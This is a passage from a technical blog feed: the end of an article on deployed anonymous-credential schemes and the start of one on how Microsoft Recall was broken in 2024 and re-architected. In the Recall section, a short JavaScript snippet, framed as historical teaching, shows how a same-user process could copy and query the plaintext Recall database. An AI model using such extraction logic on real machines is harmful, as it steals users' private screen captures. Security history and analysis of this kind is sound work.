&lt;p&gt;Three layers of unavoidable cost stack up. First, a module-LWE-based commitment needs a dimension of roughly 10 ring elements of degree 256, so the commitment object alone is around $10 \times 256 \times 32$ bits $= 10$ KB at the smallest plausible parameters. Second, the modulus must grow to $\ge 2^{32}$ for 128-bit security against current lattice attacks. Third, rejection sampling in the zero-knowledge step adds roughly a $2\times$ blow-up to the resulting proof, mitigated to roughly $1.3\times$ by BLOOM&apos;s bimodal-Gaussian trick[@bloom-kcl].&lt;/p&gt;
&lt;p&gt;The 25-fold-or-better signature-size improvements BLOOM reports over prior lattice one-out-of-many proofs are real, but they take you from &quot;very large&quot; to &quot;still large&quot; -- not to byte-scale. Constructing a post-quantum anonymous credential within an order of magnitude of BBS&apos;s wire size is a conjectured open problem. It is not currently in NIST&apos;s PQ standardisation rounds; FIPS 204 ML-DSA, FIPS 205 SLH-DSA, and FIPS 206 FN-DSA all target plain signatures, not anonymous-credential primitives.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Cross-platform interop.&lt;/strong&gt; A Bavarian EUDI mdoc presented at a Florida bar that uses AAMVA mDL verification, then the same flow on Apple Wallet, Google Wallet, and Samsung Wallet.&lt;/p&gt;
&lt;p&gt;The W3C Digital Credentials API is the browser-side connective tissue, currently a Working Draft from the Federated Identity Working Group rather than a Recommendation[@w3c-digital-creds]. OpenID for Verifiable Presentations (OID4VP) handles the online-presentation case[@openid4vp-spec]; ISO/IEC 18013-7 handles the offline case[@iso-18013-7].&lt;/p&gt;
&lt;p&gt;The deeper obstacle is in the &lt;em&gt;trust layer&lt;/em&gt;, not the presentation layer. The AAMVA and EUDI worlds publish their issuer trust anchors in structurally different forms. AAMVA&apos;s Digital Trust Service distributes a &lt;strong&gt;VICAL&lt;/strong&gt; -- a Verified Issuer Certificate Authority List -- defined under ISO/IEC 18013-5 §9, where each entry is a self-contained CA root with metadata[@aamva-dts][@iso-18013-5]. The EUDI Wallet&apos;s trust model, defined in the ARF chapter 6 and the implementing acts CIR 2024/2977 (PID and EAA) and CIR 2024/2979 (interop)[@eudi-arf][@eu-cir-2024-2977], runs on Member-State Trust Lists -- national trust-service-provider registries that the European Commission cross-recognises.&lt;/p&gt;
&lt;p&gt;A VICAL entry and a Member-State Trust List entry both express &quot;this CA root is authorised to issue an mDL or a PID,&quot; but no published cross-recognition protocol maps one to the other today. Cross-implementation conformance testing is underway in 2026 but no end-to-end interop story is shipping. The most likely path is an ISO/IEC 18013-7 profile for VICAL plus Member-State Trust List cross-anchoring in the 2027-2030 window.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Quantitative deployment metrics for Privacy Pass.&lt;/strong&gt; No primary Cloudflare or Apple figure for tokens-per-second exists in public. Matthew Green&apos;s April 2026 primer reports &quot;hundreds of thousands of transactions per second&quot; across the broader Cloudflare anti-abuse surface, of which Privacy Pass is a fraction[@green-2026-part2]. The most-deployed anonymous credential in the world lacks an actual deployment metric, which is a striking gap in a field that is otherwise generous with engineering disclosure. The structural reason is the protocol&apos;s own design: the privacy properties depend on the &lt;em&gt;size of the anonymity set per issuer key&lt;/em&gt;, and operators have no incentive to publish per-key issuance counts that would let a third party estimate the set size.&lt;/p&gt;

Matthew Green&apos;s April 2026 primer says Privacy Pass is &quot;so ubiquitous that even Microsoft uses it in their Edge browser.&quot; We could not find primary Microsoft documentation naming a specific &quot;Edge Private Access Tokens&quot; product. The Privacy Pass deployment in Edge is real -- Green is a careful source -- but we do not invent a product name that Microsoft itself does not use. That is the honest limit of the available evidence.
&lt;p&gt;&lt;strong&gt;5. Holder binding without identification.&lt;/strong&gt; Prevent credential transfer (Alice&apos;s age credential used by 17-year-old Bob) while preserving unlinkability. Binding to a hardware key works at the cost of secure-element identifiability across presentations. The cleanest formal answer at the protocol level is Brands&apos; wallet-with-observer architecture from 1993[@brands-1993-doi]; the cleanest &lt;em&gt;modern&lt;/em&gt; one is the IETF draft &lt;code&gt;draft-irtf-cfrg-bbs-per-verifier-linkability-01&lt;/code&gt; by Kalos (MATTR) and Bernstein (Grotto Networking), published March 2025[@bbs-pseudonym-draft].&lt;/p&gt;
&lt;p&gt;The construction in the draft is worth a paragraph. The holder picks a long-term &lt;code&gt;nym_secret&lt;/code&gt; $\in \mathbb{Z}_q$ at the BBS credential&apos;s issuance, committed inside the BBS message vector. For each verifier $V$, the holder derives a per-verifier pseudonym $\text{pseudonym}_V = \text{nym_secret} \cdot \text{HashToCurveG1}(\text{verifier_id}_V) \in G_1$.&lt;/p&gt;
&lt;p&gt;The same holder presenting the same credential to the same verifier twice always yields the same &lt;code&gt;pseudonym_V&lt;/code&gt; -- so the verifier can recognise returning users, which is intentional. Two different verifiers $V_1$ and $V_2$ see two different pseudonyms that they cannot link to a common holder unless they break the Decisional Diffie-Hellman assumption in $G_1$ on BLS12-381 -- a pairing-curve assumption closely related to (though not identical with) the q-Strong Diffie-Hellman assumption that underpins BBS unforgeability.&lt;/p&gt;
&lt;p&gt;Hardware binding is not in the current draft. The spec leaves it as an out-of-band concern handled by the qualified signature creation device layer: &lt;a href=&quot;https://paragmali.com/blog/apple-secure-enclave-vs-microsoft-pluton-two-roads-to-hardwa/&quot; rel=&quot;noopener&quot;&gt;Secure Enclave&lt;/a&gt; on iPhone, StrongBox on Android, Pluton or a discrete TPM on PCs. Tying a hardware-attested key to &lt;code&gt;nym_secret&lt;/code&gt; with provable unforgeability across the device boundary is the open profile work the EUDI and ISO/IEC committees are pushing on in 2026. Nothing yet ships at consumer scale that completely solves the problem.&lt;/p&gt;
&lt;p&gt;These open problems are the next-decade research and engineering agenda. The deployed answers are good enough to ship today. So: what should a relying party actually do?&lt;/p&gt;
&lt;h2&gt;10. A Practical Guide for Relying Parties&lt;/h2&gt;
&lt;p&gt;Seven concrete recommendations for choosing a credential scheme in May 2026, organised by use case.&lt;/p&gt;
&lt;h3&gt;1. Anti-Abuse and Human Attestation&lt;/h3&gt;
&lt;p&gt;Pick the RFC 9578 Privacy Pass token type that matches your operator model.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Single-tenant (issuer == verifier)&lt;/strong&gt;: VOPRF, token type 0x0001. ~96 bytes per token, sub-millisecond on both sides, but the verifier must hold the issuer secret. Best for in-house anti-abuse where the issuer and verifier are the same trust domain (Cloudflare&apos;s own surface, Chrome&apos;s Private State Tokens).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Federated (issuer != verifier)&lt;/strong&gt;: Blind RSA, token type 0x0002. 256 bytes per token (RSA-2048), publicly verifiable -- any party with the issuer public key can verify. Best for Apple&apos;s Private Access Tokens model, where Cloudflare or Fastly is the issuer and an arbitrary website is the verifier.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The redemption-side check for a publicly-verifiable token is a single RSA-PSS verification against the published issuer key. The pseudocode below shows the verifier&apos;s check in JavaScript -- the point is to make the wire format and the publicly-verifiable property concrete, not to be a drop-in implementation.&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode for redemption-side verification of a Privacy Pass token
// of type 0x0002 (Blind RSA) per RFC 9578 with RFC 9474 cryptography.
// Real implementations should use a vetted crypto library.&lt;/p&gt;
&lt;p&gt;async function verifyPrivacyPassToken(token, issuerPublicKey, origin) {
  // RFC 9578 token layout (token type 0x0002):
  //   token_type (2 bytes) || nonce (32 bytes) || challenge_digest (32 bytes)
  //   || token_key_id (32 bytes) || authenticator (Nk bytes, RSA-PSS sig)
  const view = new DataView(token);
  const tokenType = view.getUint16(0);
  if (tokenType !== 0x0002) return { ok: false, reason: &apos;wrong type&apos; };&lt;/p&gt;
&lt;p&gt;  const nonce = token.slice(2, 34);
  const challengeDigest = token.slice(34, 66);
  const tokenKeyId = token.slice(66, 98);
  const authenticator = token.slice(98);&lt;/p&gt;
&lt;p&gt;  // The signed input is everything except the authenticator itself.
  const signedInput = token.slice(0, 98);&lt;/p&gt;
&lt;p&gt;  // Bind the token to the origin&apos;s challenge (per RFC 9577).
  const expectedDigest = await sha256(buildOriginChallenge(origin));
  if (!constantTimeEquals(challengeDigest, expectedDigest)) {
    return { ok: false, reason: &apos;challenge mismatch&apos; };
  }&lt;/p&gt;
&lt;p&gt;  // The token is a stock RSA-PSS signature over the signed input,
  // under the issuer&apos;s published public key. No issuer secret needed.
  const ok = await crypto.subtle.verify(
    { name: &apos;RSA-PSS&apos;, saltLength: 48 },
    issuerPublicKey,
    authenticator,
    signedInput,
  );
  return { ok, reason: ok ? &apos;valid&apos; : &apos;bad signature&apos; };
}
`}&lt;/p&gt;

The IETF working group considered shipping only one token type. The split survived because the two operator models genuinely want different things. A single-tenant deployment (Cloudflare issues and Cloudflare verifies) saves bytes and keeps the issuer secret in-house with VOPRF, and Cloudflare can afford the operational cost of holding the secret. A federated deployment (Cloudflare issues, Apple verifies) cannot share an issuer secret across organisational trust boundaries, so the verifier needs a publicly-verifiable signature like RSA-PSS. RFC 9578 ships both and lets the deployment pick.
&lt;h3&gt;2. Age Verification in the EU&lt;/h3&gt;
&lt;p&gt;Wait for the EUDI Wallet age-attestation interface. The Member-State provisioning deadline is &lt;strong&gt;24 December 2026&lt;/strong&gt;, and mandatory private-sector acceptance for relying parties subject to eIDAS 2 begins &lt;strong&gt;6 December 2027&lt;/strong&gt;[@eidas2][@eu-cir-2024-2977]. The wire format will be SD-JWT VC over OpenID4VP, with Longfellow-zk available as the optional ZKP overlay for stronger privacy. The EU&apos;s technical portal at &lt;code&gt;ageverification.dev&lt;/code&gt; is the canonical reference for pilot integrators in 2026[@ageverification-dev].&lt;/p&gt;
&lt;h3&gt;3. Age Verification Globally With Strong Privacy&lt;/h3&gt;
&lt;p&gt;Evaluate Google&apos;s Longfellow-zk over an ISO mdoc. The reference implementation is Apache-2.0 at &lt;code&gt;github.com/google/longfellow-zk&lt;/code&gt;; the project documentation site includes security review reports[@longfellow-repo][@longfellow-docs]. The issuer requirements are &quot;do what every mDL issuer already does&quot; -- sign ECDSA-P-256 over the CBOR mdoc. The holder requirements are a phone that can run a ~1.2 s SNARK prover.&lt;/p&gt;
&lt;h3&gt;4. Full Multi-Attribute Privacy With Maximum Cryptographic Cleanliness&lt;/h3&gt;
&lt;p&gt;For a privacy-preserving employee badge, professional credential, or membership card where you control both the issuer and the consumer (an enterprise context), use BBS via &lt;code&gt;draft-irtf-cfrg-bbs-signatures-10&lt;/code&gt;[@bbs-draft-10]. Expect to operate your own pairing-based PKI on BLS12-381. Native predicate proofs and ~256-byte presentations are the reward.&lt;/p&gt;
&lt;h3&gt;5. Quick Deployment Without Multi-Show Unlinkability&lt;/h3&gt;
&lt;p&gt;If selective disclosure is required and multi-show unlinkability is not, SD-JWT VC (RFC 9901) on stock ECDSA or EdDSA is the lowest-friction integration into existing OAuth and OpenID Connect stacks[@rfc9901]. Two presentations of the same credential to colluding verifiers will be linkable; for many enterprise scenarios that is acceptable.&lt;/p&gt;
&lt;h3&gt;6. TPM or Hardware Vendor&lt;/h3&gt;
&lt;p&gt;ECDAA is in the TPM 2.0 spec; consumer-market demand is near zero[@tpm-2-spec]. The pragmatic recommendation is to wait for an operating-system-layer consumption story to mature before allocating silicon area or firmware to ECDAA in a discrete or firmware TPM.&lt;/p&gt;
&lt;h3&gt;7. Self-Sovereign Identity (SSI)&lt;/h3&gt;
&lt;p&gt;Hyperledger AnonCreds 2.0 (BBS-based) is the road forward in the SSI community; AnonCreds 1.0 (CL-RSA) is the production stack actually running in deployments like BC.GOV and Ontario Digital Trust[@anoncreds-spec]. The SSI community has run its own parallel path for years and is unlikely to converge with the EUDI Wallet stack any time soon.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Three lines to memorise. &lt;strong&gt;Anti-abuse&lt;/strong&gt;: Privacy Pass (RFC 9578) -- VOPRF if you are both issuer and verifier, blind-RSA if you are federated. &lt;strong&gt;Age verification in the EU&lt;/strong&gt;: wait for the EUDI Wallet age attestation (Member-State deadline 24 December 2026). &lt;strong&gt;Age verification globally with privacy&lt;/strong&gt;: Longfellow-zk over an ISO mdoc.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That covers the deployment matrix. An entire layer of privacy-preserving identity infrastructure now exists, in production, at internet scale. The next question is not whether the cryptography ships -- it has shipped -- but what we choose to use it for.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

Privacy Pass is anonymous against the verifier under RFC 9576&apos;s Attester / Issuer / Origin non-collusion threat model -- the attester learns which user solved which CAPTCHA, the issuer learns nothing about the user, the origin learns only that a valid token redeemed. It is *not* anonymous against an issuer-verifier colluder who shares state across the trust boundary. It is also subject to residual per-issuer linkability of the kind that comes from seeing thousands of tokens signed by the same issuer key; the formal anonymity set is &quot;all users whose tokens are signed by the same issuer key in the same epoch.&quot;

Passkeys prove WHO -- they bind an authentication event to a specific public key pair associated with a specific account. Anonymous credentials prove WHAT IS TRUE about you -- an attribute (over 18, licensed to drive) -- without identifying the holder. Different primitive, different threat model. WebAuthn and passkeys assume the verifier wants to know who you are; Privacy Pass and BBS assume the verifier specifically does not.

ECDAA is *optional* in TPM 2.0 -- the algorithm is in the spec but the TCG did not require vendors to ship it[@tpm-2-spec], no major browser or operating system ever built a challenge path, and the cryptography sits dormant on the chip. §4&apos;s &quot;DAA is OPTIONAL in TPM 2.0&quot; callout and §3&apos;s DAA subsection give the full diagnosis; the short answer is that [WebAuthn](/blog/webauthn-and-passkeys-on-windows-from-ctap-to-the-credential/) won the device-attestation slot because it has a relying-party-side consumption protocol and gives up anonymity in exchange for a usable enrolment flow.

Matthew Green&apos;s April 2026 primer says Privacy Pass is &quot;so ubiquitous that even Microsoft uses it in their Edge browser&quot;[@green-2026-part2]. We could not find primary Microsoft documentation naming a specific &quot;Edge Private Access Tokens&quot; product. The §9 Aside on this point gives the full diagnosis: the deployment is real (Green is a careful source) but we do not invent a product name that Microsoft itself does not use. That is the honest limit of the available evidence.

Technically yes -- a zero-knowledge proof on a device against a signed mdoc that contains an `age_over_18` element is a constructible and tested protocol[@ec-2026-age-app][@ageverification-dev]. Operationally, the answer depends on the EUDI Wallet rollout (the 24 December 2026 Member-State deadline is binding under eIDAS 2). Politically, the answer depends on enforcement -- whether large platforms accept anonymous proofs or insist on identifying flows that the regulation would treat as non-compliant. The Commission&apos;s &quot;technically ready&quot; claim of 15 April 2026 is verifiable against the cryptography; the deployment timeline is the open question.

Different primitive. Anonymous credentials are designed to allow N unlinkable presentations per user. Proof-of-personhood schemes are explicitly sybil-resistance mechanisms that limit one user to one presentation against a particular service. They are complementary but answer different questions, and we do not cover them here.

Orthogonal. Passkeys and anonymous credentials answer different questions and will continue to coexist. Anonymous credentials do not authenticate you to an account; passkeys do not let you prove a fact about yourself without revealing your account binding. Most production identity flows in 2027 and beyond will combine both -- a passkey for account access, an anonymous credential for attribute disclosure where identification is unnecessary.
&lt;p&gt;Forty-one years after a Berkeley graduate student described an anonymous credential in &lt;em&gt;Communications of the ACM&lt;/em&gt;, every major browser ships one, the IETF has standardised the wire format, and the European Commission has bet the regulation of online age verification on the primitive working at population scale. The cryptography did its work in the 1980s and 1990s. The protocol stack, the standards bodies, the device wallets, and the regulatory deadline came forty years later. What is left to do is the part the cryptography never claimed to do: choose what to use it for.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;anonymous-credentials-shipping&quot; keyTerms={[
  { term: &quot;Blind signature&quot;, definition: &quot;A signature scheme in which the signer signs a value masked by a holder-chosen blinding factor and never sees the underlying message.&quot; },
  { term: &quot;Anonymous credential&quot;, definition: &quot;A credential whose holder can prove a fact about themselves without revealing identity, and without two presentations being linkable.&quot; },
  { term: &quot;Selective disclosure&quot;, definition: &quot;The property that the holder can reveal an arbitrary subset of the attributes on a credential while keeping the rest hidden.&quot; },
  { term: &quot;Multi-show unlinkability&quot;, definition: &quot;The property that two or more presentations of the same credential cannot be linked across verifiers or by colluding verifiers.&quot; },
  { term: &quot;Direct Anonymous Attestation (DAA)&quot;, definition: &quot;A TPM-deployable anonymous credential primitive (Brickell-Camenisch-Chen 2004) standardised as an optional algorithm in TPM 2.0.&quot; },
  { term: &quot;OPRF / VOPRF&quot;, definition: &quot;Oblivious / Verifiable Oblivious Pseudorandom Function (RFC 9497); the cryptographic primitive behind Privacy Pass token type 0x0001.&quot; },
  { term: &quot;Privacy Pass&quot;, definition: &quot;IETF Standards-Track anonymous-token family (RFCs 9576, 9577, 9578, June 2024) deployed by Cloudflare, Apple, Chrome, and Edge.&quot; },
  { term: &quot;BBS+&quot;, definition: &quot;Pairing-based multi-message signature scheme (Au-Susilo-Mu 2006) over BLS12-381; ~80-byte signature, ~256-byte proof, multi-show unlinkable by construction.&quot; },
  { term: &quot;MPC-in-the-head&quot;, definition: &quot;Zero-knowledge proof construction (Ishai-Kushilevitz-Ostrovsky-Sahai 2007) that underlies Longfellow-zk&apos;s ECDSA-circuit SNARK.&quot; },
  { term: &quot;EUDI Wallet&quot;, definition: &quot;European Digital Identity Wallet mandated by eIDAS 2 (Regulation (EU) 2024/1183); Member-State provisioning deadline 24 December 2026.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>anonymous-credentials</category><category>privacy-pass</category><category>zero-knowledge-proofs</category><category>eudi-wallet</category><category>tpm-daa</category><category>bbs-signatures</category><category>longfellow-zk</category><category>age-verification</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>&quot;The Vault is Solid. The Delivery Truck is Not.&quot; -- Microsoft Recall&apos;s Two-Year Re-Architecture from Plaintext SQLite to VBS Enclaves</title><link>https://paragmali.com/blog/microsoft-recall-2024-2026-re-architecture/</link><guid isPermaLink="true">https://paragmali.com/blog/microsoft-recall-2024-2026-re-architecture/</guid><description>How Microsoft Recall went from a plaintext SQLite database broken in four weeks to a VBS-Enclave + TPM-sealed + Hello-gated architecture, and what TotalRecall Reloaded still extracts. (Article title borrows Alexander Hagenah&apos;s framing, attributed in §8.1.)</description><pubDate>Tue, 19 May 2026 00:00:00 GMT</pubDate><content:encoded>
In May 2024 Microsoft shipped Recall as a plaintext SQLite database guarded only by a SYSTEM-only filesystem ACL. Three independent researchers -- Kevin Beaumont, James Forshaw, and Alexander Hagenah -- broke it in four weeks. The September 27, 2024 re-architecture moved every sensitive operation into a VBS Enclave, sealed the master key with TPM 2.0, gated each access on a fresh Windows Hello biometric, and filtered credentials with Microsoft Purview Exact Data Match before persistence. It is the cleanest available case study of Pluton, VBS, the Secure Kernel, Hello ESS, and Purview composing into one feature. One seam remains: the non-enclave UI host that Hagenah&apos;s April 2026 TotalRecall Reloaded exploits, restating the original threat-model limit at a different layer.
&lt;h2&gt;1. The Script That Did Not Ship&lt;/h2&gt;
&lt;p&gt;On June 5, 2024 -- thirteen days before Microsoft Recall was scheduled to ship on Copilot+ PCs -- a Swiss security researcher named Alexander Hagenah pointed a fifty-line Python tool at the directory &lt;code&gt;C:\Users\&amp;lt;user&amp;gt;\AppData\Local\CoreAIPlatform.00\UKP\&lt;/code&gt; and pulled every screenshot Windows had taken of his desktop for the previous day in two seconds [@rec-19] [@rec-20]. The database was a plaintext SQLite file. The screenshots were plaintext PNGs. &lt;a href=&quot;https://paragmali.com/blog/from-cmdexe-to-a-kusto-row-in-90-seconds-how-sysmon-and-defe/&quot; rel=&quot;noopener&quot;&gt;Microsoft Defender for Endpoint&lt;/a&gt;, monitoring an off-the-shelf information-stealer running in the same user context, took roughly ten minutes to react -- by which time the Recall data was gone [@rec-19] [@rec-15].&lt;/p&gt;
&lt;p&gt;Hagenah called the tool &lt;em&gt;TotalRecall&lt;/em&gt; and committed it to GitHub the same day [@rec-13]. His own description of what it did, as quoted by Malwarebytes Labs: &quot;The database is unencrypted. It&apos;s all plain text. Pulling one day of snapshots took two seconds at most&quot; [@rec-20]. His description of why he released it, as quoted by Help Net Security: &quot;They should know it can be dangerous&quot; [@rec-19].&lt;/p&gt;
&lt;p&gt;This is the script that did not ship. Why it did not ship is the entire rest of this article.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The code in the snippet below is the &lt;em&gt;logic&lt;/em&gt; of a TotalRecall-style extractor against the May 20, 2024 Recall preview. It is a JavaScript transcription of a PowerShell or Python operation that would have worked against an unencrypted SQLite file in a known directory. The June 7, 2024 delay-and-recommit announcement [@rec-02] withdrew that design before broad release; the September 27, 2024 re-architecture [@rec-03] replaced it. The block exists to teach the historical failure, not to provide a runnable attack against the shipping product.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;{`
// Simulated extraction logic. Models the May 2024 Recall preview behaviour:
// plaintext SQLite at a known user-profile path, plaintext PNGs alongside it.
// The September 2024 re-architecture replaced both the storage format
// and the trust model. This is a teaching example only.&lt;/p&gt;
&lt;p&gt;const recallDir = String.raw`C:\Users\\AppData\Local\CoreAIPlatform.00\UKP`;
const databaseFile = `${recallDir}\\ukg.db`;
const imageStore   = `${recallDir}\\ImageStore`;&lt;/p&gt;
&lt;p&gt;// Step 1: Copy the SQLite file and the PNG cache out of the profile.
// In the original preview, a same-user process could read both without
// elevation, because the only protection was a SYSTEM-context filesystem ACL
// that Forshaw demonstrated was bypassable from the user&apos;s own context.
function exfiltrate() {
  copyRecurse(recallDir, &apos;/tmp/recall_dump&apos;);
  // Step 2: open the SQLite file with any client and select the OCR&apos;d text.
  const ocr = openSqlite(databaseFile);
  return ocr.query(&apos;SELECT c1, c2 FROM WindowCaptureTextIndex_content&apos;);
}&lt;/p&gt;
&lt;p&gt;// Step 3: every PNG in ImageStore is a snapshot of the desktop, named by
// the integer key the SQLite row uses to join. No decryption needed in
// the May 2024 preview.
console.log(&apos;Recall data size:&apos;, exfiltrate().length, &apos;rows&apos;);
console.log(&apos;Time elapsed (Hagenah measurement): ~2 seconds&apos;);
console.log(&apos;Defender remediation latency (Beaumont measurement): ~10 minutes&apos;);
`}&lt;/p&gt;
&lt;p&gt;The audit cast that turned the May 20 announcement into the June 7 retreat had three named protagonists. Kevin Beaumont, writing on his DoublePulsar blog on May 30, framed the threat model: Recall was a high-value secret store on a live, logged-on system, and the dominant live-system adversary was user-context malware, not offline disk theft [@rec-15] [@rec-19] [@rec-16]. James Forshaw, an active Google Project Zero researcher, published &lt;em&gt;Working your way Around an ACL&lt;/em&gt; on June 3, demonstrating that the SYSTEM-only filesystem ACL Microsoft had relied on as a same-user isolation boundary was not in fact a boundary [@rec-14]. Hagenah&apos;s &lt;em&gt;TotalRecall&lt;/em&gt;, posted June 5, turned Beaumont&apos;s framing and Forshaw&apos;s filesystem-ACL bypass into a runnable artifact [@rec-13] [@rec-19].&lt;/p&gt;
&lt;p&gt;Each was load-bearing. Without any one of them, Microsoft&apos;s June 7 delay-and-recommit blog [@rec-02] could not have landed where it did, when it did.&lt;/p&gt;
&lt;p&gt;What was Microsoft trying to do, that this script could undo?&lt;/p&gt;
&lt;h2&gt;2. The Four-Week Public Security Audit&lt;/h2&gt;
&lt;p&gt;Recall was supposed to be the marquee Copilot+ PC feature. Satya Nadella and Yusuf Mehdi previewed it at the Microsoft campus event on May 20, 2024, as one of three launch-exclusive AI experiences alongside Live Captions and Cocreator [@rec-01]. The hardware story was unusual: every Copilot+ PC would ship with &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Microsoft Pluton&lt;/a&gt; enabled by default, on Snapdragon X Elite or X Plus silicon, starting at $999, with broad GA scheduled for June 18 [@rec-01]. Recall would not appear on Intel or AMD Copilot+ PCs at launch, only on the Snapdragon silicon that defined the category.&lt;/p&gt;
&lt;p&gt;Twenty-eight days later, the June 18 GA target was gone. Here is what happened in those four weeks.&lt;/p&gt;

An information-stealer is a class of malware whose purpose is to enumerate and exfiltrate browser-saved credentials, session cookies, password manager databases, cryptocurrency wallets, and other user-accessible secret stores from a logged-on Windows session. Modern variants (RedLine, Vidar, LummaC2) ship as commodity components in malware-as-a-service marketplaces. Beaumont&apos;s structural point about Recall was that adding a new high-value local store to the InfoStealer target list trivially extends an existing economic market; no novel attack capability is required.
&lt;h3&gt;May 30, 2024 -- Beaumont names the threat model&lt;/h3&gt;
&lt;p&gt;Kevin Beaumont&apos;s post on DoublePulsar opened with a sentence Microsoft never fully recovered from: &quot;Recall enables threat actors to automate scraping everything you&apos;ve ever looked at within seconds&quot; [@rec-15] [@rec-19]. His structural point was that &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt; addresses the wrong half of the threat model for a feature like Recall. BitLocker protects data at rest against an offline adversary who picks up a powered-off laptop; it does nothing against a logged-on user whose machine is running an information-stealer in the same session. Recall, by storing months of OCR&apos;d screenshots in a user-readable directory, was not a target &lt;em&gt;adjacent&lt;/em&gt; to the InfoStealer marketplace -- it was the new high-value target &lt;em&gt;inside&lt;/em&gt; it.&lt;/p&gt;
&lt;p&gt;Beaumont also published a measurement: in his test against Defender for Endpoint, the InfoStealer was detected, but automated remediation took roughly ten minutes to fire. By then his Recall extraction script had already finished [@rec-19] [@rec-15]. The asymmetry mattered. Defender&apos;s behavioural rules were calibrated against years of stealing browser cookies, not against the sudden appearance of a brand-new bulk-capture corpus that an attacker would race to exfiltrate first.&lt;/p&gt;

Recall enables threat actors to automate scraping everything you&apos;ve ever looked at within seconds. -- Kevin Beaumont, DoublePulsar, May 30, 2024 [@rec-15] [@rec-19]
&lt;h3&gt;June 3, 2024 -- Forshaw publishes the ACL bypass&lt;/h3&gt;
&lt;p&gt;Three days later, James Forshaw of Google Project Zero published &lt;em&gt;Working your way Around an ACL&lt;/em&gt; on Tyranid&apos;s Lair [@rec-14]. The post was not nominally about Recall; it was a methodological piece on how a same-user, non-elevated process could escalate to SYSTEM-context file access by impersonating SYSTEM-context services that handle user-supplied input. The worked example was &lt;code&gt;C:\Program Files\WindowsApps&lt;/code&gt;, with a footnote linking to a Mastodon thread by Albacore noting that the Recall database directory had a structurally similar ACL.&lt;/p&gt;
&lt;p&gt;Forshaw&apos;s epigrammatic conclusion -- &quot;any privilege escalation (or non-security boundary &lt;em&gt;cough&lt;/em&gt;) is sufficient to leak the information&quot; -- captured the structural critique [@rec-14]. The asterisks around &lt;em&gt;non-security boundary&lt;/em&gt; pointed at the MSRC servicing criteria [@rec-11]: Microsoft&apos;s own published policy says that UAC and admin-to-kernel transitions are not security boundaries. If those are not boundaries, and the SYSTEM-only filesystem ACL on the Recall directory was the only thing standing between a same-user process and the database, then there was no boundary at all.&lt;/p&gt;
&lt;h3&gt;June 5, 2024 -- Hagenah commits TotalRecall&lt;/h3&gt;
&lt;p&gt;Hagenah&apos;s tool turned the framing into an artifact [@rec-13] [@rec-19] [@rec-20]. The first README, preserved on the Wayback Machine, characterised Recall as &quot;a &apos;privacy nightmare&apos;&quot; and noted matter-of-factly that the database was an unencrypted SQLite file readable in two seconds [@rec-13] [@rec-20]. Hagenah&apos;s stated motive, via Help Net Security: &quot;They should know it can be dangerous&quot; [@rec-19]. The &quot;they&quot; in that sentence was both the Microsoft engineering team that built the original design and the broader user base about to receive it.&lt;/p&gt;

flowchart LR
    A[&quot;May 20&lt;br /&gt;Nadella + Mehdi&lt;br /&gt;Copilot+ launch&lt;br /&gt;Recall previewed&quot;] --&amp;gt; B[&quot;May 30&lt;br /&gt;Beaumont&lt;br /&gt;threat-model framing&quot;]
    B --&amp;gt; C[&quot;June 3&lt;br /&gt;Forshaw&lt;br /&gt;SYSTEM ACL bypass&quot;]
    C --&amp;gt; D[&quot;June 5&lt;br /&gt;Hagenah&lt;br /&gt;TotalRecall PoC&quot;]
    D --&amp;gt; E[&quot;June 7&lt;br /&gt;Davuluri&lt;br /&gt;delay + recommit&quot;]
    E --&amp;gt; F[&quot;June 13&lt;br /&gt;Recall removed&lt;br /&gt;from June 18 GA&quot;]
&lt;h3&gt;June 7, 2024 -- Davuluri retreats and recommits&lt;/h3&gt;
&lt;p&gt;Pavan Davuluri -- promoted to President of Windows + Devices on March 26, 2024 -- published the delay-and-recommit blog on June 7 [@rec-02].Wired&apos;s coverage of the same announcement referred to Davuluri as &quot;Microsoft&apos;s corporate vice president for Windows and devices&quot; [@rec-16]. That was his prior title; the President of Windows + Devices appointment had been announced ten weeks earlier. Most outlets had not yet updated their style sheets, which is the small reason you may have seen two different titles in the same week&apos;s coverage. Three commitments anchored the post: Recall would be opt-in at setup rather than on by default (&quot;If you don&apos;t proactively choose to turn it on, it will be off by default&quot;); &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Hello Enhanced Sign-in Security&lt;/a&gt; would gate access to stored snapshots; and decryption would happen &quot;just in time,&quot; only when the user authenticated [@rec-02].&lt;/p&gt;
&lt;p&gt;The Insider rollout was promised, then slipped on August 21 and again on October 31, before finally landing in November. These three properties did not yet have a mechanism. The mechanism would arrive on September 27. But the commitment came first, in plain English, on June 7 -- and it was the commitment that bought the engineering team the time to design the architecture that would honour it.&lt;/p&gt;
&lt;p&gt;Three commitments without a mechanism. What was the mechanism going to be?&lt;/p&gt;
&lt;h2&gt;3. What the Original Recall Design Was Trying&lt;/h2&gt;
&lt;p&gt;Microsoft did not ship Recall in May 2024 because they thought encryption was unnecessary. They shipped it because they thought the protections they already had were sufficient. Four assumptions. Each one was load-bearing, and each one was wrong.&lt;/p&gt;
